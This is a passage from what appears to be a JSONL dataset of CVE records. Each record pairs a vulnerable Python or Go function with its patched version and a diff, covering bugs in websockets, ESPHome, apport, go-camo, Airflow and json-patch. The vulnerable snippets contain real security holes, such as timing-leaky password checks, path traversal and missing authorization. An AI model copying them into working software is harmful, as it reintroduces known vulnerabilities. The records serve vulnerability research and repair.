b/src/khoj/routers/api_subscription.py\n@@ -1,5 +1,6 @@\n-async def update_subscription(request: Request, email: str, 
operation: str):\n+async def update_subscription(request: Request, operation: str):\n # Retrieve the customer's details\n+ email = request.user.object.email\n customers = stripe.Customer.list(email=email).auto_paging_iter()\n customer = next(customers, None)\n if customer is None:\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2021-33880", "cve_description": "The aaugustin websockets library before 9.1 for Python has an Observable Timing Discrepancy on servers when HTTP Basic Authentication is enabled with basic_auth_protocol_factory(credentials=...). An attacker may be able to guess a password via a timing attack.", "cwe_info": {"CWE-203": {"name": "Observable Discrepancy", "description": "The product behaves differently or sends different responses under different circumstances in a way that is observable to an unauthorized actor, which exposes security-relevant information about the state of the product, such as whether a particular operation was successful or not."}}, "repo": "https://github.com/aaugustin/websockets", "patch_url": ["https://github.com/aaugustin/websockets/commit/547a26b685d08cac0aa64e5e65f7867ac0ea9bc0"], "programing_language": "Python", "vul_func": [{"id": "vul_py_418_1", "commit": "a14226a", "file_path": "src/websockets/legacy/auth.py", "start_line": 86, "end_line": 162, "snippet": "def basic_auth_protocol_factory(\n realm: str,\n credentials: Optional[Union[Credentials, Iterable[Credentials]]] = None,\n check_credentials: Optional[Callable[[str, str], Awaitable[bool]]] = None,\n create_protocol: Optional[Callable[[Any], BasicAuthWebSocketServerProtocol]] = None,\n) -> Callable[[Any], BasicAuthWebSocketServerProtocol]:\n \"\"\"\n Protocol factory that enforces HTTP Basic Auth.\n\n ``basic_auth_protocol_factory`` is designed to integrate with\n :func:`~websockets.legacy.server.serve` like this::\n\n websockets.serve(\n ...,\n create_protocol=websockets.basic_auth_protocol_factory(\n realm=\"my dev server\",\n credentials=(\"hello\", \"iloveyou\"),\n )\n )\n\n ``realm`` indicates the scope of protection. It should contain only ASCII\n characters because the encoding of non-ASCII characters is undefined.\n Refer to section 2.2 of :rfc:`7235` for details.\n\n ``credentials`` defines hard coded authorized credentials. It can be a\n ``(username, password)`` pair or a list of such pairs.\n\n ``check_credentials`` defines a coroutine that checks whether credentials\n are authorized. This coroutine receives ``username`` and ``password``\n arguments and returns a :class:`bool`.\n\n One of ``credentials`` or ``check_credentials`` must be provided but not\n both.\n\n By default, ``basic_auth_protocol_factory`` creates a factory for building\n :class:`BasicAuthWebSocketServerProtocol` instances. 
You can override this\n with the ``create_protocol`` parameter.\n\n :param realm: scope of protection\n :param credentials: hard coded credentials\n :param check_credentials: coroutine that verifies credentials\n :raises TypeError: if the credentials argument has the wrong type\n\n \"\"\"\n if (credentials is None) == (check_credentials is None):\n raise TypeError(\"provide either credentials or check_credentials\")\n\n if credentials is not None:\n if is_credentials(credentials):\n\n async def check_credentials(username: str, password: str) -> bool:\n return (username, password) == credentials\n\n elif isinstance(credentials, Iterable):\n credentials_list = list(credentials)\n if all(is_credentials(item) for item in credentials_list):\n credentials_dict = dict(credentials_list)\n\n async def check_credentials(username: str, password: str) -> bool:\n return credentials_dict.get(username) == password\n\n else:\n raise TypeError(f\"invalid credentials argument: {credentials}\")\n\n else:\n raise TypeError(f\"invalid credentials argument: {credentials}\")\n\n if create_protocol is None:\n # Not sure why mypy cannot figure this out.\n create_protocol = cast(\n Callable[[Any], BasicAuthWebSocketServerProtocol],\n BasicAuthWebSocketServerProtocol,\n )\n\n return functools.partial(\n create_protocol, realm=realm, check_credentials=check_credentials\n )"}], "fix_func": [{"id": "fix_py_418_1", "commit": "547a26b685d08cac0aa64e5e65f7867ac0ea9bc0", "file_path": "src/websockets/legacy/auth.py", "start_line": 87, "end_line": 164, "snippet": "def basic_auth_protocol_factory(\n realm: str,\n credentials: Optional[Union[Credentials, Iterable[Credentials]]] = None,\n check_credentials: Optional[Callable[[str, str], Awaitable[bool]]] = None,\n create_protocol: Optional[Callable[[Any], BasicAuthWebSocketServerProtocol]] = None,\n) -> Callable[[Any], BasicAuthWebSocketServerProtocol]:\n \"\"\"\n Protocol factory that enforces HTTP Basic Auth.\n\n ``basic_auth_protocol_factory`` is designed to integrate with\n :func:`~websockets.legacy.server.serve` like this::\n\n websockets.serve(\n ...,\n create_protocol=websockets.basic_auth_protocol_factory(\n realm=\"my dev server\",\n credentials=(\"hello\", \"iloveyou\"),\n )\n )\n\n ``realm`` indicates the scope of protection. It should contain only ASCII\n characters because the encoding of non-ASCII characters is undefined.\n Refer to section 2.2 of :rfc:`7235` for details.\n\n ``credentials`` defines hard coded authorized credentials. It can be a\n ``(username, password)`` pair or a list of such pairs.\n\n ``check_credentials`` defines a coroutine that checks whether credentials\n are authorized. This coroutine receives ``username`` and ``password``\n arguments and returns a :class:`bool`.\n\n One of ``credentials`` or ``check_credentials`` must be provided but not\n both.\n\n By default, ``basic_auth_protocol_factory`` creates a factory for building\n :class:`BasicAuthWebSocketServerProtocol` instances. 
You can override this\n with the ``create_protocol`` parameter.\n\n :param realm: scope of protection\n :param credentials: hard coded credentials\n :param check_credentials: coroutine that verifies credentials\n :raises TypeError: if the credentials argument has the wrong type\n\n \"\"\"\n if (credentials is None) == (check_credentials is None):\n raise TypeError(\"provide either credentials or check_credentials\")\n\n if credentials is not None:\n if is_credentials(credentials):\n credentials_list = [cast(Credentials, credentials)]\n elif isinstance(credentials, Iterable):\n credentials_list = list(credentials)\n if not all(is_credentials(item) for item in credentials_list):\n raise TypeError(f\"invalid credentials argument: {credentials}\")\n else:\n raise TypeError(f\"invalid credentials argument: {credentials}\")\n\n credentials_dict = dict(credentials_list)\n\n async def check_credentials(username: str, password: str) -> bool:\n try:\n expected_password = credentials_dict[username]\n except KeyError:\n return False\n return hmac.compare_digest(expected_password, password)\n\n if create_protocol is None:\n # Not sure why mypy cannot figure this out.\n create_protocol = cast(\n Callable[[Any], BasicAuthWebSocketServerProtocol],\n BasicAuthWebSocketServerProtocol,\n )\n\n return functools.partial(\n create_protocol,\n realm=realm,\n check_credentials=check_credentials,\n )"}], "vul_patch": "--- a/src/websockets/legacy/auth.py\n+++ b/src/websockets/legacy/auth.py\n@@ -47,23 +47,22 @@\n \n if credentials is not None:\n if is_credentials(credentials):\n-\n- async def check_credentials(username: str, password: str) -> bool:\n- return (username, password) == credentials\n-\n+ credentials_list = [cast(Credentials, credentials)]\n elif isinstance(credentials, Iterable):\n credentials_list = list(credentials)\n- if all(is_credentials(item) for item in credentials_list):\n- credentials_dict = dict(credentials_list)\n-\n- async def check_credentials(username: str, password: str) -> bool:\n- return credentials_dict.get(username) == password\n-\n- else:\n+ if not all(is_credentials(item) for item in credentials_list):\n raise TypeError(f\"invalid credentials argument: {credentials}\")\n-\n else:\n raise TypeError(f\"invalid credentials argument: {credentials}\")\n+\n+ credentials_dict = dict(credentials_list)\n+\n+ async def check_credentials(username: str, password: str) -> bool:\n+ try:\n+ expected_password = credentials_dict[username]\n+ except KeyError:\n+ return False\n+ return hmac.compare_digest(expected_password, password)\n \n if create_protocol is None:\n # Not sure why mypy cannot figure this out.\n@@ -73,5 +72,7 @@\n )\n \n return functools.partial(\n- create_protocol, realm=realm, check_credentials=check_credentials\n+ create_protocol,\n+ realm=realm,\n+ check_credentials=check_credentials,\n )\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-27081", "cve_description": "ESPHome is a system to control your ESP8266/ESP32. A security misconfiguration in the edit configuration file API in the dashboard component of ESPHome version 2023.12.9 (command line installation) allows authenticated remote attackers to read and write arbitrary files under the configuration directory rendering remote code execution possible. 
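The CVE-2021-33880 patch above replaces an equality comparison, which short-circuits on the first differing character, with `hmac.compare_digest`, whose running time does not depend on where the strings diverge. A minimal sketch of the fixed pattern, assuming a hypothetical in-memory credential dict (the names here are illustrative, not taken from the patch):

```python
import hmac

CREDENTIALS = {"hello": "iloveyou"}  # hypothetical store for illustration

def check_credentials(username: str, password: str) -> bool:
    try:
        expected_password = CREDENTIALS[username]
    except KeyError:
        return False  # unknown user: nothing to compare
    # compare_digest scans both strings in full, so the response time does
    # not reveal how many leading characters of the guess were correct.
    return hmac.compare_digest(expected_password, password)
```

As in fix_py_418_1, the unknown-user branch still returns faster than a full comparison; the patch narrows the timing channel to username existence rather than password prefixes.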
This vulnerability is patched in 2024.2.1.\n", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/esphome/esphome", "patch_url": ["https://github.com/esphome/esphome/commit/d814ed1d4adc71fde47c4df41215bee449884513"], "programing_language": "Python", "vul_func": [{"id": "vul_py_152_1", "commit": "84c6e52", "file_path": "esphome/dashboard/web_server.py", "start_line": 807, "end_line": 815, "snippet": " async def get(self, configuration: str | None = None) -> None:\n \"\"\"Get the content of a file.\"\"\"\n loop = asyncio.get_running_loop()\n filename = settings.rel_path(configuration)\n content = await loop.run_in_executor(\n None, self._read_file, filename, configuration\n )\n if content is not None:\n self.write(content)"}, {"id": "vul_py_152_2", "commit": "84c6e52", "file_path": "esphome/dashboard/web_server.py", "start_line": 834, "end_line": 843, "snippet": " async def post(self, configuration: str | None = None) -> None:\n \"\"\"Write the content of a file.\"\"\"\n loop = asyncio.get_running_loop()\n config_file = settings.rel_path(configuration)\n await loop.run_in_executor(\n None, self._write_file, config_file, self.request.body\n )\n # Ensure the StorageJSON is updated as well\n DASHBOARD.entries.async_schedule_storage_json_update(filename)\n self.set_status(200)"}], "fix_func": [{"id": "fix_py_152_1", "commit": "d814ed1", "file_path": "esphome/dashboard/web_server.py", "start_line": 807, "end_line": 823, "snippet": " async def get(self, configuration: str | None = None) -> None:\n \"\"\"Get the content of a file.\"\"\"\n if not configuration.endswith((\".yaml\", \".yml\")):\n self.send_error(404)\n return\n\n filename = settings.rel_path(configuration)\n if Path(filename).resolve().parent != settings.absolute_config_dir:\n self.send_error(404)\n return\n\n loop = asyncio.get_running_loop()\n content = await loop.run_in_executor(\n None, self._read_file, filename, configuration\n )\n if content is not None:\n self.write(content)"}, {"id": "fix_py_152_2", "commit": "d814ed1", "file_path": "esphome/dashboard/web_server.py", "start_line": 842, "end_line": 857, "snippet": " async def post(self, configuration: str | None = None) -> None:\n \"\"\"Write the content of a file.\"\"\"\n if not configuration.endswith((\".yaml\", \".yml\")):\n self.send_error(404)\n return\n\n filename = settings.rel_path(configuration)\n if Path(filename).resolve().parent != settings.absolute_config_dir:\n self.send_error(404)\n return\n\n loop = asyncio.get_running_loop()\n await loop.run_in_executor(None, self._write_file, filename, self.request.body)\n # Ensure the StorageJSON is updated as well\n DASHBOARD.entries.async_schedule_storage_json_update(filename)\n self.set_status(200)"}], "vul_patch": "--- a/esphome/dashboard/web_server.py\n+++ b/esphome/dashboard/web_server.py\n@@ -1,7 +1,15 @@\n async def get(self, configuration: str | None = None) -> None:\n \"\"\"Get the 
content of a file.\"\"\"\n+ if not configuration.endswith((\".yaml\", \".yml\")):\n+ self.send_error(404)\n+ return\n+\n+ filename = settings.rel_path(configuration)\n+ if Path(filename).resolve().parent != settings.absolute_config_dir:\n+ self.send_error(404)\n+ return\n+\n loop = asyncio.get_running_loop()\n- filename = settings.rel_path(configuration)\n content = await loop.run_in_executor(\n None, self._read_file, filename, configuration\n )\n\n--- a/esphome/dashboard/web_server.py\n+++ b/esphome/dashboard/web_server.py\n@@ -1,10 +1,16 @@\n async def post(self, configuration: str | None = None) -> None:\n \"\"\"Write the content of a file.\"\"\"\n+ if not configuration.endswith((\".yaml\", \".yml\")):\n+ self.send_error(404)\n+ return\n+\n+ filename = settings.rel_path(configuration)\n+ if Path(filename).resolve().parent != settings.absolute_config_dir:\n+ self.send_error(404)\n+ return\n+\n loop = asyncio.get_running_loop()\n- config_file = settings.rel_path(configuration)\n- await loop.run_in_executor(\n- None, self._write_file, config_file, self.request.body\n- )\n+ await loop.run_in_executor(None, self._write_file, filename, self.request.body)\n # Ensure the StorageJSON is updated as well\n DASHBOARD.entries.async_schedule_storage_json_update(filename)\n self.set_status(200)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-1326", "cve_description": "A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege. It is extremely unlikely that a system administrator would configure sudo to allow unprivileged users to perform this class of exploit.", "cwe_info": {"CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/canonical/apport", "patch_url": ["https://github.com/canonical/apport/commit/e5f78cc89f1f5888b6a56b785dddcb0364c48ecb"], "programing_language": "Python", "vul_func": [{"id": "vul_py_227_1", "commit": "ee3e896", "file_path": "apport/ui.py", "start_line": 122, "end_line": 152, "snippet": "def run_as_real_user(args: list[str]) -> None:\n \"\"\"Call subprocess.run as real user if called via sudo/pkexec.\n\n If we are called through pkexec/sudo, determine the real user ID and\n run the command with it to get the user's web browser settings.\n \"\"\"\n uid = _get_env_int(\"SUDO_UID\", _get_env_int(\"PKEXEC_UID\"))\n if uid is None or not get_process_user_and_group().is_root():\n subprocess.run(args, check=False)\n return\n\n pwuid = pwd.getpwuid(uid)\n\n gid = _get_env_int(\"SUDO_GID\")\n if gid is None:\n gid = pwuid.pw_gid\n\n env = {\n k: v\n for k, v in os.environ.items()\n if not k.startswith(\"SUDO_\") and k != \"PKEXEC_UID\"\n } | _get_users_environ(uid)\n env[\"HOME\"] = pwuid.pw_dir\n subprocess.run(\n args,\n check=False,\n env=env,\n user=uid,\n group=gid,\n extra_groups=os.getgrouplist(pwuid.pw_name, gid),\n )"}, {"id": "vul_py_227_2", "commit": "ee3e896", "file_path": "bin/apport-cli", "start_line": 184, "end_line": 200, "snippet": " def ui_update_view(self, stdout=None):\n self.in_update_view = True\n report = self._get_details()\n try:\n subprocess.run(\n [\"/usr/bin/sensible-pager\"],\n check=False,\n 
input=report.encode(\"UTF-8\"),\n stdout=stdout,\n )\n except OSError as error:\n # ignore broken pipe (premature quit)\n if error.errno == errno.EPIPE:\n pass\n else:\n raise\n self.in_update_view = False"}], "fix_func": [{"id": "fix_py_227_1", "commit": "e5f78cc", "file_path": "apport/ui.py", "start_line": 122, "end_line": 159, "snippet": "def run_as_real_user(\n args: list[str], *, get_user_env: bool = False, **kwargs\n) -> None:\n \"\"\"Call subprocess.run as real user if called via sudo/pkexec.\n\n If we are called through pkexec/sudo, determine the real user ID and\n run the command with it to get the user's web browser settings.\n If get_user_env is set to True, the D-BUS address and XDG_DATA_DIRS\n is grabbed from a running gvfsd and added to the process environment.\n \"\"\"\n uid = _get_env_int(\"SUDO_UID\", _get_env_int(\"PKEXEC_UID\"))\n if uid is None or not get_process_user_and_group().is_root():\n subprocess.run(args, check=False, **kwargs)\n return\n\n pwuid = pwd.getpwuid(uid)\n\n gid = _get_env_int(\"SUDO_GID\")\n if gid is None:\n gid = pwuid.pw_gid\n\n env = {\n k: v\n for k, v in os.environ.items()\n if not k.startswith(\"SUDO_\") and k != \"PKEXEC_UID\"\n }\n if get_user_env:\n env |= _get_users_environ(uid)\n env[\"HOME\"] = pwuid.pw_dir\n subprocess.run(\n args,\n check=False,\n env=env,\n user=uid,\n group=gid,\n extra_groups=os.getgrouplist(pwuid.pw_name, gid),\n **kwargs,\n )"}, {"id": "fix_py_227_2", "commit": "e5f78cc", "file_path": "bin/apport-cli", "start_line": 184, "end_line": 199, "snippet": " def ui_update_view(self, stdout=None):\n self.in_update_view = True\n report = self._get_details()\n try:\n apport.ui.run_as_real_user(\n [\"/usr/bin/sensible-pager\"],\n input=report.encode(\"UTF-8\"),\n stdout=stdout,\n )\n except OSError as error:\n # ignore broken pipe (premature quit)\n if error.errno == errno.EPIPE:\n pass\n else:\n raise\n self.in_update_view = False"}], "vul_patch": "--- a/apport/ui.py\n+++ b/apport/ui.py\n@@ -1,12 +1,16 @@\n-def run_as_real_user(args: list[str]) -> None:\n+def run_as_real_user(\n+ args: list[str], *, get_user_env: bool = False, **kwargs\n+) -> None:\n \"\"\"Call subprocess.run as real user if called via sudo/pkexec.\n \n If we are called through pkexec/sudo, determine the real user ID and\n run the command with it to get the user's web browser settings.\n+ If get_user_env is set to True, the D-BUS address and XDG_DATA_DIRS\n+ is grabbed from a running gvfsd and added to the process environment.\n \"\"\"\n uid = _get_env_int(\"SUDO_UID\", _get_env_int(\"PKEXEC_UID\"))\n if uid is None or not get_process_user_and_group().is_root():\n- subprocess.run(args, check=False)\n+ subprocess.run(args, check=False, **kwargs)\n return\n \n pwuid = pwd.getpwuid(uid)\n@@ -19,7 +23,9 @@\n k: v\n for k, v in os.environ.items()\n if not k.startswith(\"SUDO_\") and k != \"PKEXEC_UID\"\n- } | _get_users_environ(uid)\n+ }\n+ if get_user_env:\n+ env |= _get_users_environ(uid)\n env[\"HOME\"] = pwuid.pw_dir\n subprocess.run(\n args,\n@@ -28,4 +34,5 @@\n user=uid,\n group=gid,\n extra_groups=os.getgrouplist(pwuid.pw_name, gid),\n+ **kwargs,\n )\n\n--- a/bin/apport-cli\n+++ b/bin/apport-cli\n@@ -2,9 +2,8 @@\n self.in_update_view = True\n report = self._get_details()\n try:\n- subprocess.run(\n+ apport.ui.run_as_real_user(\n [\"/usr/bin/sensible-pager\"],\n- check=False,\n input=report.encode(\"UTF-8\"),\n stdout=stdout,\n )\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-14255", "cve_description": "A Server Side Request Forgery 
(SSRF) vulnerability in go-camo up to version 1.1.4 allows a remote attacker to perform HTTP requests to internal endpoints.", "cwe_info": {"CWE-918": {"name": "Server-Side Request Forgery (SSRF)", "description": "The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination."}}, "repo": "https://github.com/cactus/go-camo", "patch_url": ["https://github.com/cactus/go-camo/commit/77c86db145869cc2d1985644b4232356e3a6076e"], "programing_language": "Go", "vul_func": [{"id": "vul_go_102_1", "commit": "b1a0717", "file_path": "pkg/router/router.go", "start_line": 37, "end_line": 62, "snippet": "func (dr *DumbRouter) ServeHTTP(w http.ResponseWriter, r *http.Request) {\n\t// set some default headers\n\tdr.SetHeaders(w)\n\n\tif r.Method != \"HEAD\" && r.Method != \"GET\" {\n\t\thttp.Error(w, \"Method Not Allowed\", 405)\n\t}\n\n\tcomponents := strings.Split(r.URL.Path, \"/\")\n\tif len(components) == 3 {\n\t\tdr.CamoHandler.ServeHTTP(w, r)\n\t\treturn\n\t}\n\n\tif r.URL.Path == \"/healthcheck\" {\n\t\tdr.HealthCheckHandler(w, r)\n\t\treturn\n\t}\n\n\tif dr.StatsHandler != nil && r.URL.Path == \"/status\" {\n\t\tdr.StatsHandler(w, r)\n\t\treturn\n\t}\n\n\thttp.Error(w, \"404 Not Found\", 404)\n}"}], "fix_func": [{"id": "fix_go_102_1", "commit": "77c86db", "file_path": "pkg/router/router.go", "start_line": 37, "end_line": 63, "snippet": "func (dr *DumbRouter) ServeHTTP(w http.ResponseWriter, r *http.Request) {\n\t// set some default headers\n\tdr.SetHeaders(w)\n\n\tif r.Method != \"HEAD\" && r.Method != \"GET\" {\n\t\thttp.Error(w, \"Method Not Allowed\", 405)\n\t\treturn\n\t}\n\n\tcomponents := strings.Split(r.URL.Path, \"/\")\n\tif len(components) == 3 {\n\t\tdr.CamoHandler.ServeHTTP(w, r)\n\t\treturn\n\t}\n\n\tif r.URL.Path == \"/healthcheck\" {\n\t\tdr.HealthCheckHandler(w, r)\n\t\treturn\n\t}\n\n\tif dr.StatsHandler != nil && r.URL.Path == \"/status\" {\n\t\tdr.StatsHandler(w, r)\n\t\treturn\n\t}\n\n\thttp.Error(w, \"404 Not Found\", 404)\n}"}], "vul_patch": "--- a/pkg/router/router.go\n+++ b/pkg/router/router.go\n@@ -4,6 +4,7 @@\n \n \tif r.Method != \"HEAD\" && r.Method != \"GET\" {\n \t\thttp.Error(w, \"Method Not Allowed\", 405)\n+\t\treturn\n \t}\n \n \tcomponents := strings.Split(r.URL.Path, \"/\")\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2023-50944", "cve_description": "Apache Airflow, versions before 2.8.1, have a vulnerability that allows an authenticated user to access the source code of a DAG to which they don't have access.\u00a0This vulnerability is considered low since it requires an authenticated user to exploit it. 
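The entire CVE-2019-14255 fix above is one added `return`, because Go's `http.Error` only writes the error response and does not stop the handler, so a rejected method still fell through to the proxy. A rough Python analogue of the same fall-through bug class (the `serve` function and `respond` callback are hypothetical, not from go-camo):

```python
def serve(method: str, path: str, respond) -> None:
    """Toy router; respond is any callback taking (status, body)."""
    if method not in ("GET", "HEAD"):
        respond(405, "Method Not Allowed")
        return  # omitting this line reproduces the bug: the rejected
                # request would still reach the proxy call below
    respond(200, "proxied " + path)

serve("POST", "/img", print)  # prints only: 405 Method Not Allowed
```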
Users are recommended to upgrade to version 2.8.1, which fixes this issue.", "cwe_info": {"CWE-862": {"name": "Missing Authorization", "description": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action."}, "CWE-639": {"name": "Authorization Bypass Through User-Controlled Key", "description": "The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data."}}, "repo": "https://github.com/apache/airflow", "patch_url": ["https://github.com/apache/airflow/commit/8d76538d6e105947272b000581c6fabec20146b1"], "programing_language": "Python", "vul_func": [{"id": "vul_py_308_1", "commit": "1180255", "file_path": "airflow/api_connexion/endpoints/dag_source_endpoint.py", "start_line": 32, "end_line": 48, "snippet": "def get_dag_source(*, file_token: str) -> Response:\n \"\"\"Get source code using file token.\"\"\"\n secret_key = current_app.config[\"SECRET_KEY\"]\n auth_s = URLSafeSerializer(secret_key)\n try:\n path = auth_s.loads(file_token)\n dag_source = DagCode.code(path)\n except (BadSignature, FileNotFoundError):\n raise NotFound(\"Dag source not found\")\n\n return_type = request.accept_mimetypes.best_match([\"text/plain\", \"application/json\"])\n if return_type == \"text/plain\":\n return Response(dag_source, headers={\"Content-Type\": return_type})\n if return_type == \"application/json\":\n content = dag_source_schema.dumps({\"content\": dag_source})\n return Response(content, headers={\"Content-Type\": return_type})\n return Response(\"Not Allowed Accept Header\", status=HTTPStatus.NOT_ACCEPTABLE)"}, {"id": "vul_py_308_2", "commit": "1180255", "file_path": "airflow/models/dagcode.py", "start_line": 180, "end_line": 185, "snippet": " def code(cls, fileloc) -> str:\n \"\"\"Return source code for this DagCode object.\n\n :return: source code as string\n \"\"\"\n return cls._get_code_from_db(fileloc)"}], "fix_func": [{"id": "fix_py_308_1", "commit": "8d76538d6e105947272b000581c6fabec20146b1", "file_path": "airflow/api_connexion/endpoints/dag_source_endpoint.py", "start_line": 39, "end_line": 61, "snippet": "@provide_session\ndef get_dag_source(*, file_token: str, session: Session = NEW_SESSION) -> Response:\n \"\"\"Get source code using file token.\"\"\"\n secret_key = current_app.config[\"SECRET_KEY\"]\n auth_s = URLSafeSerializer(secret_key)\n try:\n path = auth_s.loads(file_token)\n dag_ids = session.query(DagModel.dag_id).filter(DagModel.fileloc == path).all()\n readable_dags = get_readable_dags()\n # Check if user has read access to all the DAGs defined in the file\n if any(dag_id[0] not in readable_dags for dag_id in dag_ids):\n raise PermissionDenied()\n dag_source = DagCode.code(path, session=session)\n except (BadSignature, FileNotFoundError):\n raise NotFound(\"Dag source not found\")\n\n return_type = request.accept_mimetypes.best_match([\"text/plain\", \"application/json\"])\n if return_type == \"text/plain\":\n return Response(dag_source, headers={\"Content-Type\": return_type})\n if return_type == \"application/json\":\n content = dag_source_schema.dumps({\"content\": dag_source})\n return Response(content, headers={\"Content-Type\": return_type})\n return Response(\"Not Allowed Accept Header\", status=HTTPStatus.NOT_ACCEPTABLE)"}, {"id": "fix_py_308_2", "commit": "8d76538d6e105947272b000581c6fabec20146b1", "file_path": "airflow/models/dagcode.py", "start_line": 180, "end_line": 186, "snippet": " 
@provide_session\n def code(cls, fileloc, session: Session = NEW_SESSION) -> str:\n \"\"\"Return source code for this DagCode object.\n\n :return: source code as string\n \"\"\"\n return cls._get_code_from_db(fileloc, session)"}], "vul_patch": "--- a/airflow/api_connexion/endpoints/dag_source_endpoint.py\n+++ b/airflow/api_connexion/endpoints/dag_source_endpoint.py\n@@ -1,10 +1,16 @@\n-def get_dag_source(*, file_token: str) -> Response:\n+@provide_session\n+def get_dag_source(*, file_token: str, session: Session = NEW_SESSION) -> Response:\n \"\"\"Get source code using file token.\"\"\"\n secret_key = current_app.config[\"SECRET_KEY\"]\n auth_s = URLSafeSerializer(secret_key)\n try:\n path = auth_s.loads(file_token)\n- dag_source = DagCode.code(path)\n+ dag_ids = session.query(DagModel.dag_id).filter(DagModel.fileloc == path).all()\n+ readable_dags = get_readable_dags()\n+ # Check if user has read access to all the DAGs defined in the file\n+ if any(dag_id[0] not in readable_dags for dag_id in dag_ids):\n+ raise PermissionDenied()\n+ dag_source = DagCode.code(path, session=session)\n except (BadSignature, FileNotFoundError):\n raise NotFound(\"Dag source not found\")\n \n\n--- a/airflow/models/dagcode.py\n+++ b/airflow/models/dagcode.py\n@@ -1,6 +1,7 @@\n- def code(cls, fileloc) -> str:\n+ @provide_session\n+ def code(cls, fileloc, session: Session = NEW_SESSION) -> str:\n \"\"\"Return source code for this DagCode object.\n \n :return: source code as string\n \"\"\"\n- return cls._get_code_from_db(fileloc)\n+ return cls._get_code_from_db(fileloc, session)\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2018-14632", "cve_description": "An out of bound write can occur when patching an Openshift object using the 'oc patch' functionality in OpenShift Container Platform before 3.7. 
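The CVE-2023-50944 patch above gates the DAG source behind a permission check: if the file defines any DAG outside the caller's readable set, the whole request is refused. A condensed sketch of that guard, with plain arguments standing in for Airflow's session query and permission helper (both hypothetical here):

```python
def get_dag_source_checked(path, dag_ids_in_file, readable_dag_ids):
    # One unreadable DAG in the file is enough to refuse the source,
    # mirroring the any(...) check added in the patch.
    if any(dag_id not in readable_dag_ids for dag_id in dag_ids_in_file):
        raise PermissionError("caller may not read every DAG in this file")
    with open(path) as f:
        return f.read()
```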
An attacker can use this flaw to cause a denial of service attack on the Openshift master api service which provides cluster management.", "cwe_info": {"CWE-787": {"name": "Out-of-bounds Write", "description": "The product writes data past the end, or before the beginning, of the intended buffer."}}, "repo": "https://github.com/evanphx/json-patch", "patch_url": ["https://github.com/evanphx/json-patch/commit/4c9aadca8f89e349c999f04e28199e96e81aba03#diff-65c563bba473be9d94ce4d033f74810e"], "programing_language": "Go", "vul_func": [{"id": "vul_go_292_1", "commit": "9f095e0732475147cbb029ffd99634b386d06651", "file_path": "patch.go", "start_line": 377, "end_line": 407, "snippet": "func (d *partialArray) add(key string, val *lazyNode) error {\n\tif key == \"-\" {\n\t\t*d = append(*d, val)\n\t\treturn nil\n\t}\n\n\tidx, err := strconv.Atoi(key)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tary := make([]*lazyNode, len(*d)+1)\n\n\tcur := *d\n\n\tif idx < 0 {\n\t\tidx *= -1\n\n\t\tif idx > len(ary) {\n\t\t\treturn fmt.Errorf(\"Unable to access invalid index: %d\", idx)\n\t\t}\n\t\tidx = len(ary) - idx\n\t}\n\n\tcopy(ary[0:idx], cur[0:idx])\n\tary[idx] = val\n\tcopy(ary[idx+1:], cur[idx:])\n\n\t*d = ary\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_292_1", "commit": "4c9aadca8f89e349c999f04e28199e96e81aba03", "file_path": "patch.go", "start_line": 377, "end_line": 409, "snippet": "func (d *partialArray) add(key string, val *lazyNode) error {\n\tif key == \"-\" {\n\t\t*d = append(*d, val)\n\t\treturn nil\n\t}\n\n\tidx, err := strconv.Atoi(key)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tary := make([]*lazyNode, len(*d)+1)\n\n\tcur := *d\n\n\tif idx < 0 {\n\t\tidx *= -1\n\n\t\tif idx > len(ary) {\n\t\t\treturn fmt.Errorf(\"Unable to access invalid index: %d\", idx)\n\t\t}\n\t\tidx = len(ary) - idx\n\t}\n\tif idx < 0 || idx >= len(ary) || idx > len(cur) {\n\t\treturn fmt.Errorf(\"Unable to access invalid index: %d\", idx)\n\t}\n\tcopy(ary[0:idx], cur[0:idx])\n\tary[idx] = val\n\tcopy(ary[idx+1:], cur[idx:])\n\n\t*d = ary\n\treturn nil\n}"}], "vul_patch": "--- a/patch.go\n+++ b/patch.go\n@@ -21,7 +21,9 @@\n \t\t}\n \t\tidx = len(ary) - idx\n \t}\n-\n+\tif idx < 0 || idx >= len(ary) || idx > len(cur) {\n+\t\treturn fmt.Errorf(\"Unable to access invalid index: %d\", idx)\n+\t}\n \tcopy(ary[0:idx], cur[0:idx])\n \tary[idx] = val\n \tcopy(ary[idx+1:], cur[idx:])\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2019-10767", "cve_description": "An attacker can include file contents from outside the `/adapter/xxx/` directory, where `xxx` is the name of an existent adapter like \"admin\". It is exploited using the administrative web panel with a request for an adapter file. 
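The CVE-2018-14632 fix above rejects any insertion index outside the valid range before the `copy` calls run; previously an out-of-range index reached the slicing and write below the check, crashing the caller (the reported denial of service). A Python analogue of the hardened `add`, keeping the Go code's negative-index convention (a sketch, not the upstream implementation):

```python
def json_patch_add(items: list, key: str, value) -> list:
    if key == "-":
        return items + [value]
    idx = int(key)  # mirrors strconv.Atoi; may raise ValueError
    if idx < 0:
        # As in the Go code, -1 addresses the slot after the last element.
        idx = len(items) + 1 + idx
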